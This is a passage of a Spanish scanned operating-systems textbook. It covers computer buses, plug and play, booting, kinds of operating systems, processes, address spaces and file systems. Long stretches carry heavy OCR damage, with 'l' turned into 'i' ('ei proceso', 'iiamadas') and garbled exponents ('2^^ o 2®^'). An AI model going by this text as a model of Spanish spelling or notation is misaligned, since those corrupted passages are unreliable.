para conectar dispositivos periféricos tales como discos y CD-ROM al sistema. El bus IDE es 
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fruto de la interfaz controladora de disco en la PC/AT y ahora es estándar en casi todos los sistemas 
basados en Pentium para el disco duro y a menudo para el CD-ROM . 

El USB (Universal Serial Bus; Bus serial universal) se inventó para conectar a la computadora 
todos los dispositivos de E/S lentos, como el teclado y el ratón. Utiliza un pequeño conectar con cua¬ 
tro cables, dos de los cuales suministran energía eléctrica a los dispositivos USB. El USB es un bus 
centralizado en el que un dispositivo raíz sondea los dispositivos de E/S cada 1 milisegundo para ver 
si tienen tráfico. USB 1.0 podía manejar una carga agregada de 1.5 M B/seg, pero el más reciente USB 
2.0 puede manejar 60 M B/seg. Todos los dispositivos USB comparten un solo dispositivo controlador 
USB, lo que hace innecesario instalar un nuevo controlador para cada nuevo dispositivo USB. En con¬ 
secuencia, pueden agregarse dispositivos USB a la computadora sin necesidad de reiniciar. 

El bus SCSI (Small Computer System Interface, Interfaz para sistemas de cómputo pequeños) 
es un bus de alto rendimiento, diseñado para discos, escáneres y otros dispositivos veloces que ne¬ 
cesitan de un ancho de banda considerable. Puede operar a una velocidad de transferencia de hasta 
160 M B/seg. Ha estado presente en los sistemas M acintosh desde que se inventaron y también es 
popular en UNIX y en ciertos sistemas basados en Intel. 

Hay otro bus (que no se muestra en la figura 1-12) conocido como IEEE 1394. Algunas veces 
se le conoce como FireWire, aunque hablando en sentido estricto, FireWire es el nombre que utili- 
zaApple para su implementación del 1394. Al igual que el USB, el IEEE 1394 es un bus de bits en 
serie, pero está diseñado para transferencias empaquetadas de hasta 100 M B/seg., lo que lo hace 
conveniente para conectar a una computadora cámaras de video digitales y dispositivos multimedia 
similares. A diferencia del USB, el lEE 1394 no tiene un dispositivo controlador central. 

Para trabajar en un entorno tal como el de la figura 1-12, el sistema operativo tiene que saber 
qué dispositivos periféricos están conectados a la computadora y cómo configurarlos. Este requeri¬ 
miento condujo a Intel y M icrosoft a diseñar un sistema de PC conocido como plug and play ba¬ 
sado en un concepto similar que se impiementó por primera vez en la Apple M acintosh. Antes de 
plug and play, cada tarjeta de E/S tenía un nivel de petición de interrupción fijo y direcciones fijas 
para sus registros de E/S. Por ejemplo, el teclado tenía la interrupción 1 y utilizaba las direcciones 
de E/S 0x60 a 0x64, el dispositivo controlador de disco flexible tenía la interrupción 6 y utilizaba 
las direcciones de E/S 0x3F0 a 0x3F7, la impresora tenía la interrupción 7 y utilizaba las direccio¬ 
nes de E/S 0x378 a 0x37A, y así sucesivamente. 

Hasta aquí todo está bien. El problema llegó cuando el usuario compraba una tarjeta de sonido 
y una tarjeta de módem que utilizaban la misma interrupción, por ejemplo, la 4. Instaladas juntas 
serían incapaces de funcionar. La solución fue incluir interruptores DIP o puentes (jumpers) en ca¬ 
da tarjeta de E/S e indicar al usuario que por favor los configurara para seleccionar un nivel de in¬ 
terrupción y direcciones de dispositivos de E/S que no estuvieran en conflicto con las demás tarjetas 
en el sistema del usuario. Los adolescentes que dedicaron sus vidas a las complejidades del hard¬ 
ware de la PC podían algunas veces hacer esto sin cometer errores. Por desgracia nadie más podía 
hacerlo, lo cual provocó un caos. 

La función de plug and play es permitir que el sistema recolecte automáticamente la informa¬ 
ción acerca de los dispositivos de E/S, asigne los niveles de interrupción y las direcciones de E/S 
de manera central, para que después indique a cada tarjeta cuáles son sus números. Este trabajo es¬ 
tá íntimamente relacionado con el proceso de arranque de la computadora, por lo que a continua¬ 
ción analizaremos este proceso nada trivial. 
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1.3.7 Arranque de la computadora 

En forma muy breve, el proceso de arranque del Pentium es el siguiente. Cada Pentium contiene 
una tarjeta madre (motherboard). En la tarjeta madre o padre hay un programa conocido como 
BIOS (Basic Input Output System, Sistema básico de entrada y salida) del sistema. El BIOS con¬ 
tiene software de E/S de bajo nivel, incluyendo procedimientos para leer el teclado, escribir en la 
pantalla y realizar operaciones de E/S de disco, entre otras cosas. Hoy en día está contenido en una 
RA M tipo flash que es no volátil pero el sistema operativo puede actualizarla cuando se encuentran 
errores en el BIOS. 

Cuando se arranca la computadora, el BIOS inicia su ejecución. Primero hace pruebas para ver 
cuánta RAM hay instalada y si el teclado junto con otros dispositivos básicos están instalados y respon¬ 
den en forma correcta. Empieza explorando los buses ISA y PCI para detectar todos los dispositivos co¬ 
nectados a ellos. Comúnmente, algunos de estos dispositivos son heredados (es decir, se diseñaron 
antes de inventar la tecnología plug and play), además de tener valores fijos para los niveles de inte¬ 
rrupciones y las direcciones de E/S (que posiblemente se establecen mediante interruptores o puentes 
en la tarjeta de E/S, pero que el sistema operativo no puede modificar). Estos dispositivos se registran; 
y los dispositivos plug and play también. Si los dispositivos presentes son distintos de los que había 
cuando el sistema se inició por última vez, se configuran los nuevos dispositivos. 

Después, el BIOS determina el dispositivo de arranque, para lo cual prueba una lista de dispo¬ 
sitivos almacenada en la memoria CM OS. El usuario puede cambiar esta lista si entra a un progra¬ 
ma de configuración del BIOS, justo después de iniciar el sistema. Por lo general, se hace un intento 
por arrancar del disco flexible, si hay uno presente. Si eso falla, se hace una consulta a la unidad 
de CD-ROM para ver si contiene un CD-ROM que se pueda arrancar. Si no hay disco flexible ni 
CD-ROM que puedan iniciarse, el sistema se arranca desde el disco duro. El primer sector del dis¬ 
positivo de arranque se lee y se coloca en la memoria, para luego ejecutarse. Este sector contiene 
un programa que por lo general examina la tabla de particiones al final del sector de arranque, pa¬ 
ra determinar qué partición está activa. Después se lee un cargador de arranque secundario de esa 
partición. Este cargador lee el sistema operativo de la partición activa y lo inicia. 

Luego, el sistema operativo consulta al BIOS para obtener la información de configuración. Pa¬ 
ra cada dispositivo, comprueba si tiene el driver correspondiente. De no ser así, pide al usuario que 
inserte un CD-ROM que contenga el driver (suministrado por el fabricante del dispositivo). Una vez 
que tiene los drivers de todos los dispositivos, el sistema operativo los carga en el kernel. Después 
inicializa sus tablas, crea los procesos de segundo plano que se requieran, y arranca un programa 
de inicio de sesión o GUI. 


1.4 LOSTIPOS DE SISTEMAS OPERATIVOS 

Los sistemas operativos han estado en funcionamiento durante más de medio siglo. Durante este 
tiempo se ha desarrollado una variedad bastante extensa de ellos, no todos se conocen ampliamente. 
En esta sección describiremos de manera breve nueve. M ás adelante en el libro regresaremos a ver 
algunos de estos distintos ti pos de sistemas. 
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1.4.1 Sistemas operativos de mainframe 

En el extremo superior están los sistemas operativos para las mainframes, las computadoras del tama¬ 
ño de un cuarto completo que aún se encuentran en los principales centros de datos corporativos. La 
diferencia entre estas computadoras y las personales está en su capacidad deE/S. Una mainframe con 
1000 discos y millones de gigabytes de datos no es poco común; una computadora personal con estas 
especificaciones sería la envidia de los amigos del propietario. Las mainframes también están volvien¬ 
do a figurar en el ámbito computacional como servidores Web de alto rendimiento, servidores para si¬ 
tios de comercio electrónico a gran escala y servidores para transacciones de negocio a negocio. 

Los sistemas operativos para las mainframes están profundamente orientados hacia el procesa¬ 
miento de muchos trabajos a la vez, de los cuales la mayor parte requiere muchas operaciones de 
E/S. Por lo general ofrecen tres tipos de servicios: procesamiento por lotes, procesamiento de tran¬ 
sacciones y tiempo compartido. Un sistema de procesamiento por lotes procesa los trabajos de ru¬ 
tina sin que haya un usuario interactivo presente. El procesamiento de reclamaciones en una 
compañía de seguros o el reporte de ventas para una cadena de tiendas son actividades que se rea¬ 
lizan comúnmente en modo de procesamiento por lotes. Los sistemas de procesamiento de transac¬ 
ciones manejan grandes cantidades de pequeñas peticiones, por ejemplo: el procesamiento de 
cheques en un banco o las reservaciones en una aerolínea. Cada unidad de trabajo es pequeña, pe¬ 
ro el sistema debe manejar cientos o miles por segundo. Los sistemas de tiempo compartido permi¬ 
ten que varios usuarios remotos ejecuten trabajos en la computadora al mismo tiempo, como 
consultar una gran base de datos. Estas funciones están íntimamente relacionadas: a menudo los sis¬ 
temas operativos de las mainframes las realizan todas. Un ejemplo de sistema operativo de main¬ 
frame es el OS/390, un descendiente del OS/360. Sin embargo, los sistemas operativos de 
mainframes están siendo reemplazados gradualmente por variantes de UNIX, como Linux. 

1.4.2 Sistemas operativos de servidores 

En el siguiente nivel hacia abajo se encuentran los sistemas operativos de servidores. Se ejecutan 
en servidores, que son computadoras personales muy grandes, estaciones de trabajo o incluso main¬ 
frames. Dan servicio a varios usuarios a la vez a través de una red y les permiten compartir los re¬ 
cursos de hardware y de software. Los servidores pueden proporcionar servicio de impresión, de 
archivos o Web. Los proveedores de Internet operan muchos equipos servidores para dar soporte a 
sus clientes y los sitios Web utilizan servidores para almacenar las páginas Web y hacerse cargo de 
las peticiones entrantes. A Igunos sistemas operativos de servidores comunes son Solaris, FreeBSD, 
L i nux y W i ndows Server 200x. 

1.4.3 Sistemas operativos de multiprocesadores 

U na manera cada vez más común de obtener poder de cómputo de las grandes ligas es conectar varias 
CPU en un solo sistema. Dependiendo de la exactitud con la que se conecten y de lo que se comparta, 
estos sistemas se conocen como computadoras en paralelo, multicomputadoras o multiprocesadores. 
Necesitan sistemas operativos especiales, pero a menudo son variaciones de los sistemas operativos de 
servidores con características especiales para la comunicación, conectividad y consistencia. 
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Con la reciente llegada de los chips multinúcleo para las computadoras personales, hasta los 
sistemas operativos de equipos de escritorio y portátiles convencionales están empezando a lidiar 
con multiprocesadores de al menos pequeña escala y es probable que el número de núcleos aumen¬ 
te con el tiempo. Por fortuna, se conoce mucho acerca de los sistemas operativos de multiprocesa- 
dores gracias a los años de investigación previa, por lo que el uso de este conocimiento en los 
sistemas multinúcleo no debe presentar dificultades. La parte difícil será hacer que las aplicaciones 
hagan uso de todo este poder de cómputo. M uchos sistemas operativos populares (incluyendo Win¬ 
dows y Linux) se ejecutan en multiprocesadores. 

1.4.4 Sistemas operativos de computadoras personales 

La siguiente categoría es el sistema operativo de computadora personal. Todos los sistemas opera¬ 
tivos modernos soportan la multiprogramación, con frecuencia se inician docenas de programas al 
momento de arrancar el sistema. Su trabajo es proporcionar buen soporte para un solo usuario. Se 
utilizan ampliamente para el procesamiento de texto, las hojas de cálculo y el acceso a Internet. Al¬ 
gunos ejemplos comunes son Linux, FreeBSD, Windows Vista y el sistema operativo M acintosh. 
Los sistemas operativos de computadora personal son tan conocidos que tal vez no sea necesario 
presentarlos con mucho detalle. De hecho, muchas personas ni siquiera están conscientes de que 
existen otros tipos de sistemas operativos. 

1.4.5 Sistemas operativos de computadoras de bolsillo 

Continuando con los sistemas cada vez más pequeños, llegamos a las computadoras de bolsillo 
(handheid). Una computadora de bolsillo o PDA (Personal Digital Assitant, Asistente personal di¬ 
gital) es una computadora que cabe en los bolsillos y realiza una pequeña variedad de funciones, 
como libreta de direcciones electrónica y bloc de notas. Además, hay muchos teléfonos celulares 
muy similares a los PDAs, con la excepción de su teclado y pantalla. En efecto, los PDAsy los te¬ 
léfonos celulares se han fusionado en esencia y sus principales diferencias se observan en el tama¬ 
ño, el peso y la interfaz de usuario. Casi todos ellos se basan en CPUs de 32 bits con el modo 
protegido y ejecutan un sofisticado sistema operativo. 

Los sistemas operativos que operan en estos dispositivos de bolsillo son cada vez más sofisti¬ 
cados, con la habilidad de proporcionar telefonía, fotografía digital y otras funciones. M uchos de 
ellos también ejecutan aplicaciones desarrolladas por terceros. De hecho, algunos están comenzan¬ 
do a asemejarse a los sistemas operativos de computadoras personales de hace una década. U na de 
las principales diferencias entre los dispositivos de bolsillo y las PCs es que los primeros no tienen 
discos duros de varios cientos de gigabytes, lo cual cambia rápidamente. Dos de los sistemas ope¬ 
rativos más populares para los dispositivos de bolsillo son Symbian OS y Palm OS. 

1.4.6 Sistemas operativos integrados 

Los sistemas integrados (embedded), que también se conocen como incrustados o embebidos, operan 
en las computadoras que controlan dispositivos que no se consideran generalmente como computado¬ 
ras, ya que no aceptan software instalado por el usuario. Algunos ejemplos comunes son los hornos 
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de microondas, las televisiones, los autos, los grabadores de DVDs, los teléfonos celulares y los re¬ 
productores de M P3. La propiedad principal que diferencia a los sistemas integrados de los dispositi¬ 
vos de bolsillo es la certeza de que nunca se podrá ejecutar software que no sea confiable. No se 
pueden descargar nuevas aplicaciones en el horno de microondas: todo el software se encuentra en 
ROM . Esto significa que no hay necesidad de protección en las aplicaciones, lo cual conlleva a cier¬ 
ta simplificación. Los sistemas como QNX y VxWorks son populares en este dominio. 

1.4.7 Sistemas operativos de nodos sensores 

Las redes de pequeños nodos sensores se están implementando para varios fines. Estos nodos son 
pequeñas computadoras que se comunican entre sí con una estación base, mediante el uso de comu¬ 
nicación inalámbrica. Estas redes de sensores se utilizan para proteger los perímetros de los edifi¬ 
cios, resguardar las fronteras nacionales, detectar incendios en bosques, medir la temperatura y la 
precipitación para el pronóstico del tiempo, deducir información acerca del movimiento de los ene¬ 
migos en los campos de batalla y mucho más. 

Los sensores son pequeñas computadoras con radios integrados y alimentadas con baterías. 
Tienen energía limitada y deben trabajar durante largos periodos al exterior y desatendidas, con fre¬ 
cuencia en condiciones ambientales rudas. La red debe ser lo bastante robusta como para tolerar fa¬ 
llas en los nodos individuales, que ocurren con mayor frecuencia a medida que las baterías 
empiezan a agotarse. 

Cada nodo sensores una verdadera computadora, con una CPU, RAM , ROM y uno o más sen¬ 
sores ambientales. Ejecuta un sistema operativo pequeño pero real, por lo general manejador de 
eventos, que responde a los eventos externos o realiza mediciones en forma periódica con base en un 
reloj interno. El sistema operativo tiene que ser pequeño y simple debido a que los nodos tienen po¬ 
ca RAM y el tiempo de vida délas baterías es una cuestión importante. Además, al igual que con los 
sistemas integrados, todos los programas se cargan por adelantado: los usuarios no inician repenti¬ 
namente programas que descargaron de Internet, lo cual simplifica el diseño en forma considerable. 
TinyOS es un sistema operativo bien conocido para un nodo sensor. 

1.4.8 Sistemas operativos en tiempo real 

Otro tipo de sistema operativo es el sistema en tiempo real. Estos sistemas se caracterizan por tener 
el tiempo como un parámetro clave. Por ejemplo, en los sistemas de control de procesos industria¬ 
les, las computadoras en tiempo real tienen que recolectar datos acerca del proceso de producción 
y utilizarlos para controlar las máquinas en la fábrica. A menudo hay tiempos de entrega estrictos 
que se deben cumplir. Por ejemplo, si un auto se desplaza sobre una línea de ensamblaje, deben lle¬ 
varse a cabo ciertas acciones en determinados instantes. Si un robot soldador realiza su trabajo de 
soldadura antes o después de tiempo, el auto se arruinará. Si la acción debe ocurrir sin excepción 
en cierto momento (o dentro de cierto rango), tenemos un sistema en tiempo real duro. M uchos 
de estos sistemas se encuentran en el control de procesos industriales, en aeronáutica, en la milicia 
y en áreas de aplicación similares. Estos sistemas deben proveer garantías absolutas de que cierta 
acción ocurrirá en un instante determinado. 
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Otro tipo de sistema en tiempo reai es ei sistema en tiempo reai suave, en ei cuai es acepta- 
bieque muy ocasionaimente se pueda faiiar a un tiempo predeterminado. Los sistemas deaudio di- 
gitai o de muitimedia están en esta categoría. Los teiéfonos digitaies también son ejempios de 
sistema en tiempo reai suave. 

Como en ios sistemas en tiempo reai escruciai cumpiir con tiempos predeterminados para rea- 
iizar una acción, aigunas veces ei sistema operativo es simpiemente una bibiioteca eniazada con ios 
programas de apiicación, en donde todo está acopiado en forma estrecha y no hay protección entre 
cada una de ias partes dei sistema. Un ejempio de este tipo de sistema en tiempo reai es e-Cos. 

Las categorías de sistemas para computadoras de boisiiio, sistemas integrados y sistemas en 
tiempo reai se trasiapan en forma considerabie. Casi todos eiios tienen por io menos ciertos aspec¬ 
tos de tiempo reai suave. Los sistemas integrados y de tiempo reai sóio ejecutan software que coio- 
can ios diseñadores dei sistema: ios usuarios no pueden agregar su propio software, io cuai faciiita 
ia protección. Los sistemas de computadoras de boisiiio y ios sistemas integrados están diseñados 
para ios consumidores, mientras que ios sistemas en tiempo reai son más adecuados para ei uso in- 
dustriai. Sin embargo, tienen ciertas características en común. 

1.4.9 Sistemas operativos de tarjetas inteligentes 

Los sistemas operativos más pequeños operan en ias tarjetas inteiigentes, que son dispositivos dei 
tamaño de una tarjeta de crédito que contienen un chip de CPU. Tienen varias severas restricciones 
de poder de procesamiento y memoria. Aigunas se energizan mediante contactos en ei iector en ei 
que se insertan, pero ias tarjetas inteiigentes sin contactos se energizan mediante inducción, iocuai 
iimita en forma considerabie ias cosas que pueden hacer. Aigunos sistemas de este tipo pueden rea- 
iizar una soia función, como pagos eiectrónicos; otros pueden iievar a cabo varias funciones en ia 
misma tarjeta inteiigente. A menudo éstos son sistemas propietarios. 

A igunas tarjetas inteiigentes funcionan con j ava. L o que esto significa es que ia ROM en ia tar¬ 
jeta inteiigente contiene un intérprete para ia M áquina virtuai de java (jVM ). Los appiets de java 
(pequeños programas) se descargan en ia tarjeta y son interpretados por ei intérprete de iajVM .Ai¬ 
gunas de estas tarjetas pueden manejar varias appiets de java ai mismo tiempo, io cuai coniieva a 
ia muitiprogramación y a ia necesidad de pianificarios. La administración de ios recursos y su pro¬ 
tección también se convierten en un probiema cuando hay dos o más appiets presentes ai mismo 
tiempo. Ei sistema operativo (que por io generai es en extremo primitivo) presente en ia tarjeta es 
ei encargado de manejar estas cuestiones. 

1.5 CONCEPTOS DE LOS SISTEMAS OPERATIVOS 

La mayoría de ios sistemas operativos proporcionan ciertos conceptos básicos y abstracciones taies 
como procesos, espacios de direcciones y archivos, que son ia base para comprender su funciona¬ 
miento. En ias siguientes secciones anaiizaremos aigunos de estos conceptos básicos en forma bre¬ 
ve, como una introducción. M ás adeiante en ei iibro voiveremos a anaiizar cada uno de eiios con 
mayor detaiie. Para iiustrar estos conceptos, de vez en cuando utiiizaremos ejempios que por io ge¬ 
nerai se basan en UNIX. No obstante, por lo general existen también ejemplos similares en otros 
sistemas, además de que en el capítulo 11 estudiaremos Windows Vista con detalle. 
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1.5.1 Procesos 

U n concepto clave en todos los sistemas operativos es ei proceso. U n proceso es en esencia un pro¬ 
grama en ejecución. Cada proceso tiene asociado un espacio de direcciones, una iista de ubicacio¬ 
nes de memoria que va desde aigún mínimo (generaimente 0) hasta cierto vaior máximo, donde ei 
proceso puede ieer y escribir información. Ei espacio de direcciones contiene ei programa ejecuta- 
bie, ios datos dei programa y su piia. También hay asociado a cada proceso un conjunto de recur¬ 
sos, que comúnmente inciuye registros (ei contador de programa y ei apuntador de piia, entre eiios), 
una iista de archivos abiertos, aiarmas pendientes, iistas de procesos reiacionados y toda ia demás 
información necesaria para ejecutar ei programa. En esencia, un proceso es un recipiente que guar¬ 
da toda ia información necesaria para ejecutar un programa. 

En ei capítuio 2 voiveremos a anaiizar ei concepto de proceso con más detaiie, pero por ahora 
ia manera más fácii de que ei iector se dé una buena idea de io que es un proceso es pensar en un 
sistema de muitiprogramación. Ei usuario puede haber iniciado un programa de edición de video 
para convertir un video de una hora a un formato específico (aigo que puede tardar horas) y des¬ 
pués irse a navegar en ia Web. M ientras tanto, un proceso en segundo piano que despierta en forma 
periódica para comprobar ios mensajes entrantes puede haber empezado a ejecutarse. Así tenemos 
(cuando menos) tres procesos activos: ei editor de video, ei navegador Web y ei iector de correo 
eiectrónico. Cada cierto tiempo, ei sistema operativo decide detener ia ejecución de un proceso y 
empezar a ejecutar otro; por ejempio, debido a que ei primero ha utiiizado más tiempo dei que ie 
correspondía de ia CPU en ei úitimo segundo. 

Cuando un proceso se suspende en forma temporai como en ei ejempio anterior, debe reiniciar¬ 
se después exactamente en ei mismo estado que tenía cuando se detuvo. Esto significa que toda ia 
información acerca dei proceso debe guardarse en forma expiícita en aiguna parte durante i a sus¬ 
pensión. Por ejempio, ei proceso puede tener varios archivos abiertos para ieerios ai mismo tiem¬ 
po. Con cada uno de estos archivos hay un apuntador asociado que proporciona ia posición actuai 
(es decir, ei número dei byteo registro que se va a ieer a continuación). Cuando un proceso se sus¬ 
pende en forma temporai, todos estos apuntadores deben guardarse de manera que una i i amada a 
read que se ejecute después de reiniciar ei proceso iea ios datos apropiados. En muchos sistemas 
operativos, toda ia información acerca de cada proceso (además dei contenido de su propio espacio 
de direcciones) se aimacena en una tabia dei sistema operativo, conocida como ia tabla de proce¬ 
sos, ia cuai es un arregio (o iista eniazada) de estructuras, una para cada proceso que se encuentre 
actuaimente en existencia. 

Así, un proceso (suspendido) consiste en su espacio de direcciones, que se conoce comúnmen¬ 
te como imagen de núcleo (en honor de ias memorias de núcieo magnético utiiizadas antaño) y su 
entrada en i a tabia de procesos, que guarda ei contenido de sus registros y muchos otros ei ementas 
necesarios para reiniciar ei proceso más adeiante. 

Las ñamadas ai sistema de administración de procesos ciave son ias que se encargan de ia crea¬ 
ción y ia terminación de ios procesos. Considere un ejempio común. Un proceso ñamado intérpre¬ 
te de comandos o Shell iee comandos de una terminai. Ei usuario acaba de escribir un comando, 
soiicitando iacompiiación de un programa. Ei sheii debe entonces crear un proceso para ejecutar ei 
compiiador. Cuando ese proceso ha terminado ia compiiación, ejecuta una ñamada ai sistema para 
terminarse a sí mismo. 
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Si un proceso puede crear uno o más procesos aparte (conocidos como procesos hijos) y estos 
procesos a su vez pueden crear procesos hijos, iiegamos rápidamente i a estructura de árboi de pro¬ 
cesos de ia figura 1-13. Los procesos reiacionados que cooperan para reaiizar un cierto trabajo a 
menudo necesitan comunicarse entre sí y sincronizar sus actividades. A esta comunicación se ie co¬ 
noce como comunicación entre procesos, que veremos con detaiie en ei capítuio 2. 



Figura 1-13. Un árbol de proceso. El proceso A creó dos proceso hijos, B y C. El pro¬ 
ceso B creó tres procesos hijos, D, E y F. 


Hay otras iiamadas ai sistema de procesos disponibies para soiicitar más memoria (o iiberar 
ia memoria sin utiiizar), esperar a que termine un proceso hijo y superponer su programa con uno 
distinto. 

En aigunas ocasiones se tiene ia necesidad de transmitir información a un proceso en ejecución 
que no está esperando esta información. Por ejempio, un proceso que se comunica con otro, en una 
computadora distinta, envía ios mensajes ai proceso remoto a través de una red de computadoras. 
Para protegerse contra ia posibiiidad de que se pierda un mensaje o su contestación, ei emisor pue¬ 
de soiicitar que su propio sistema operativo ie notifique después de cierto número de segundos pa¬ 
ra que pueda retransmitir ei mensaje, si no se ha recibido aún ia señai de aceptación. Después de 
asignar este temporizador, ei programa puede continuar reai izando otro trabajo. 

Cuando ha transcurrido ei número especificado de segundos, ei sistema operativo envía una se¬ 
ñal de alarma ai proceso. La señai provoca que ei proceso suspenda en forma temporai io que esté 
haciendo, aimacene sus registros en ia piia y empiece a ejecutar un procedimiento manejador de se¬ 
ñai es especiai, por ejempio, para retransmitir un mensaje que se considera perdido. Cuando termina 
ei manejador de señai es, ei proceso en ejecución se reinicia en ei estado en ei que se encontraba jus¬ 
to antes de ia señai. Las señai es son ia anaiogía en software de ias interrupciones de hardware y se 
pueden generar mediante una variedad de causas además de ia expiración de ios temporizadores. M u- 
chas traps detectadas por ei hardware, como ia ejecución de una instrucción iiegai oei uso de una di¬ 
rección inváiida, también se convierten en señaies que se envían ai proceso cuipabie. 

Cada persona autorizada para utiiizar un sistema recibe una UID (User Identification, Identifica¬ 
ción de usuario) que el administrador del sistema le asigna. Cada proceso iniciado tiene el UID de la 
persona que lo inició. Un proceso hijo tiene el mismo UID que su padre. Los usuarios pueden ser miem¬ 
bros de grupos, cada uno de los cuales tiene una GID (Group Identification, Identificación de grupo). 

Una UID conocida como superusuario (superuser en UNIX) tiene poder especial y puede vio¬ 
lar muchas de las reglas de protección. En instalaciones extensas, sólo el administrador del sistema 
conoce la contraseña requerida para convertirse en superusuario, pero muchos de los usuarios ordi- 
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narios (en especial los estudiantes) dedican un esfuerzo considerable para tratar de encontrar fallas 
en el sistema que les permitan convertirse en superusuario sin la contraseña. 

En el capítulo 2 estudiaremos los procesos, la comunicación entre procesos y las cuestiones re¬ 
lacionadas. 

1.5.2 Espacios de direcciones 

Cada computadora tiene cierta memoria principal que utiliza para mantener los programas en ejecución. 
En un sistema operativo muy simple sólo hay un programa a la vez en la memoria. Para ejecutar un se¬ 
gundo programa se tiene que quitar el primero y colocar el segundo en la memoria. 

Los sistemas operativos más sofisticados permiten colocar varios programas en memoria al 
mismo tiempo. Para evitar que interfieran unos con otros (y con el sistema operativo), se necesita 
cierto mecanismo de protección. A unque este mecanismo tiene que estar en el hardware, es contro¬ 
lado por el sistema operativo. 

El anterior punto de vista se relaciona con la administración y protección de la memoria prin¬ 
cipal de la computadora. Aunque diferente, dado que la administración del espacio de direcciones 
de los procesos está relacionada con la memoria, es una actividad de igual importancia. Por lo ge¬ 
neral, cada proceso tiene cierto conjunto de direcciones que puede utilizar, que generalmente van 
desde 0 hasta cierto valor máximo. En el caso más simple, la máxima cantidad de espacio de direc¬ 
ciones que tiene un proceso es menor que la memoria principal. De esta forma, un proceso puede 
llenar su espacio de direcciones y aún así habrá suficiente espacio en la memoria principal para con¬ 
tener todo lo necesario. 

Sin embargo, en muchas computadoras las direcciones son de 32 o 64 bits, con lo cual se ob¬ 
tiene un espacio de direcciones de 2^^ o 2®^ bytes, respectivamente. ¿Qué ocurre si un proceso tie¬ 
ne más espacio de direcciones que la memoria principal de la computadora, y desea usarlo todo? 
En las primeras computadoras, dicho proceso simplemente no podía hacer esto. Hoy en día existe 
una técnica llamada memoria virtual, como se mencionó antes, en la cual el sistema operativo man¬ 
tiene una parte del espacio de direcciones en memoria principal y otra parte en el disco, moviendo 
pedazos de un lugar a otro según sea necesario. En esencia, el sistema operativo crea la abstracción 
de un espacio de direcciones como el conjunto de direcciones al que puede hacer referencia un pro¬ 
ceso. El espacio de direcciones se desacopla de la memoria física de la máquina, pudiendo ser ma¬ 
yor o menor que la memoria física. La administración de los espacios de direcciones y la memoria 
física forman una parte importante de lo que hace un sistema operativo, por lo cual el capítulo 3 se 
dedica a este tema. 

1.5.3 Archivos 

Otro concepto clave de casi todos los sistemas operativos es el sistema de archivos. Como se dijo 
antes, una de las funciones principales del sistema operativo es ocultar las peculiaridades de los dis¬ 
cos y demás dispositivos de E/S, presentando al programador un modelo abstracto limpio y agrada¬ 
ble de archivos independientes del dispositivo. Sin duda se requieren las llamadas al sistema para 
crear los archivos, eliminarlos, leer y escribir en ellos. Antes de poder leer un archivo, debe local!- 
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zarse en el disco para abrirse y una vez que se ha ieído información dei archivo debe cerrarse, por 
io que se proporcionan iiamadas para hacer estas cosas. 

Para proveer un iugar en donde se puedan mantener ios archivos, ia mayoría de ios sistemas 
operativos tienen ei concepto de un directorio como una manera de agrupar archivos. Por ejem- 
pio, un estudiante podría tener un directorio para cada curso que esté tomando (para ios progra¬ 
mas necesarios para ese curso), otro directorio para su correo eiectrónicoy otro más para su página 
de inicio en Worid Wide Web. Así, se necesitan iiamadas ai sistema para crear y eiiminar directo¬ 
rios. También se proporcionan iiamadas para poner un archivo existente en un directorio y para 
eiiminar un archivo de un directorio. Las entradas de directorio pueden ser archivos u otros direc¬ 
torios. Este modeio también da surgimiento a una jerarquía (ei sistema de archivos) como se mues¬ 
tra en ia figura 1-14. 


Directorio raíz 



Las jerarquías de procesos y de archivos están organizadas en forma deárboies, pero ia simiii- 
tud se detiene ahí. Por io generai, ias jerarquías de procesos no son muy profundas (más de tres ni- 
veies es aigo inusuai), mientras que ias jerarquías de archivos son comúnmente de cuatro, cinco o 
inciuso más niveies de profundidad. Es común que ias jerarquías de procesos tengan un tiempo de 
vida corto, por io generai de minutos a io más, mientras que ia jerarquía de directorios puede exis¬ 
tir por años. La propiedad y ia protección también difieren para ios procesos y ios archivos. Por io 
común, sóio un proceso padre puede controiar o inciuso acceder a un proceso hijo, pero casi siem- 
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pre existen mecanismos para permitir que ios archivos y directorios sean ieídos por un grupo apar¬ 
te dei propietario. 

Para especificar cada archivo dentro de ia jerarquía de directorio, se proporciona su nombre 
de ruta de ia parte superior de ia jerarquía de directorios, ei directorio raíz. Dichos nombres de ru¬ 
ta absoi utos consisten deia iista de directorios que deben recorrerse desde ei directorio raíz para iie- 
gar ai archivo, y se utiiizan barras diagonaies para separar ios componentes. En ia figura 1-14, ia 
ruta para ei archivo CSIOI es/Docentes/Prof.Brown/Cursos/CSlOl. La primera barra diagonai in¬ 
dica que ia ruta es absoiuta, es decir, que empieza en ei directorio raíz. Como una observación adi- 
cionai, en M S-DOS y Windows se utiiiza ei carácter de barra diagonai inversa (\) como separador 
en vez dei carácter de barra diagonai (/), por io que ia ruta dei archivo antes mostrado podría escri¬ 
birse como \Docentes\Prof.Brown\Cursos\CS101. A i o iargo de este iibro uti i izaremos generai men¬ 
te ia convención de U NIX para las rutas. 

En cada instante, cada proceso tiene un directorio de trabajo actual, en el que se buscan los 
nombres de ruta que no empiecen con una barra diagonal. Como ejemplo, en la figura 1-14 si /Do- 
centes/Prof.Brown fuera el directorio de trabajo, entonces el uso del nombre de ruta Cursos/C 5101 
produciría el mismo archivo que el nombre de ruta absoluto antes proporcionado. Los procesos pue¬ 
den modificar su directorio de trabajo mediante una llamada al sistema que especifique el nuevo di¬ 
rectorio de trabajo. 

Antes de poder leer o escribir en un archivo se debe abrir y en ese momento se comprueban los 
permisos. Si está permitido el acceso, el sistema devuelve un pequeño entero conocido como des¬ 
criptor de archivo para usarlo en las siguientes operaciones. Si el acceso está prohibido, se devuel¬ 
ve un código de error. 

Otro concepto importante en UNIX es el sistema de archivos montado. Casi todas las compu¬ 
tadoras personales tienen una o más unidades ópticas en las que se pueden insertar los CD-ROM s 
y losDVDs. Casi siempre tienen puertos USB, a los que se pueden conectar memorias USB (en rea¬ 
lidad son unidades de estado sólido), y algunas computadoras tienen discos flexibles o discos du¬ 
ros externos. Para ofrecer una manera elegante de lidiar con estos medios removibles, UNIX 
permite adjuntar el sistema de archivos en un CD-ROM o DV D al árbol principal. Considere la si¬ 
tuación de la figura l-15(a). A ntes de la llamada mount (montar), el sistema de archivos raíz en el 
disco duro y un segundo sistema de archivos en un CD-ROM están separados y no tienen relación 
alguna. 

Sin embargo, el sistema de archivo en el CD-ROM no se puede utilizar, debido a que no hay 
forma de especificar los nombres de las rutas en él. UNIX no permite colocar prefijos a los nom¬ 
